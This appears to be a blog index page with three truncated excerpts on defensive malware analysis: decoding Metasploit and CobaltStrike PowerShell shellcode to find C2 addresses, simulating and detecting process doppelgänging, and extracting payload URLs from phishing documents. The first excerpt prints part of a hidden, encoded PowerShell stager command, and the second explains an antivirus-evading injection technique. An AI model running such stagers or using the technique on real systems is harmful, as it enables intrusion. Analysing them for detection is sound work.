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Showing posts from 2019

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZ...

Mimikatz Process Doppleganging

This post is just about running a tool created by hasherezade  to perform process doppleganging. All credit goes to the researchers Tal Liberman   and Eugene Kogan from  enSilo and also  hasherezade I just wanted to simulate the same process doppleganging and detect with  pe-sieve , it is recommended to walk through author's blackhat presentation  Lost in transaction - Process Doppelgänging and tool creator's write up  Process Doppelgänging – a new way to impersonate a process Process doppelganing is a code injection technique ( can be a substitute to traditional process hollowing code injection technique) that leverages NTFS transacations related Windows API calls which are less used with malicious intent and hence "less known" to AV vendors, hence this code injection technique is more likely to go undetected. The Doppelgänging objective is to load and execute aribitrary code in the context of a legitimate process, none of the process hollow...

Maldoc external relatonship with type oleobject

Introduction  Phishing malicious documents can contain external relationship with type oleobject. A defender objective is to kill the attack at the early stage by blocking malicious domains at perimeter, this post levarages  Cyberchef   to extract payload urls quickly from malicious office documents CyberChef is an open source tool maintained by GCHQ . It provides a drag and drop interface via a web browser (Firefox & Chrome) to quickly perform a wide range of data manipulation functions called 'operations'. A sequence of operations is called a 'recipe'. As all the processing is client-side, CyberChef can be downloaded and used offline or in an air-gapped forensic network. CyberChef has operations useful for disk forensics, malware & network analysts, and even OSINT researchers. Tools  Cyberchef    Analysis  All document samples are pulled from Hybrid Analysis - a free malware analysis service for the community that detects...